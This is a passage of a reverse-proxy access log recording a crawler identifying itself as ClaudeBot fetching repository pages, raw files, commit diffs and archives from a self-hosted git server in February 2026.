AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 216.73.216.188] [Length 10976] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 216.73.216.188] [Length 10981] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.bundle" [Client 216.73.216.188] [Length 12771771] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 216.73.216.188] [Length 10964] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Finit_db.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 216.73.216.188] [Length 10969] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js?display=source" [Client 216.73.216.188] [Length 24074] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt?display=rendered" [Client 216.73.216.188] [Length 11164] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10858] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 11865] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12777] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 216.73.216.188] [Length 14260] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html?display=rendered" [Client 216.73.216.188] [Length 10927] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup" [Client 216.73.216.188] [Length 105646] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 216.73.216.188] [Length 10968] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json?display=rendered" [Client 216.73.216.188] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile?display=source" [Client 216.73.216.188] [Length 11561] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 11103] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" [Client 216.73.216.188] [Length 9849] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal" [Client 216.73.216.188] [Length 50614] [Gzip 9.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" [Client 216.73.216.188] [Length 9836] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9867] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 216.73.216.188] [Length 10991] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10919] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj?display=source" [Client 216.73.216.188] [Length 11510] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" [Client 216.73.216.188] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/update_status.py?display=source" [Client 216.73.216.188] [Length 13235] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" [Client 216.73.216.188] [Length 10311] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 18376] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/index.html?display=source" [Client 216.73.216.188] [Length 14639] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py?display=source" [Client 216.73.216.188] [Length 12991] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 216.73.216.188] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 15921] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 216.73.216.188] [Length 10975] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" [Client 216.73.216.188] [Length 11443] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 217021] [Gzip 13.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=mail_contact.py" [Client 216.73.216.188] [Length 21286] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 216.73.216.188] [Length 10969] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 216.73.216.188] [Length 10928] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh?display=rendered" [Client 216.73.216.188] [Length 10936] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2F.vscode%2Fsettings.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 10282] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf?display=rendered" [Client 216.73.216.188] [Length 10854] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 173135] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md?display=source" [Client 216.73.216.188] [Length 15613] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv" -[15/Feb/2026:09:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" [Client 216.73.216.188] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker" [Client 216.73.216.188] [Length 174840] [Gzip 12.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.zip" [Client 216.73.216.188] [Length 25552080] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2F.vscode%2Flaunch.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 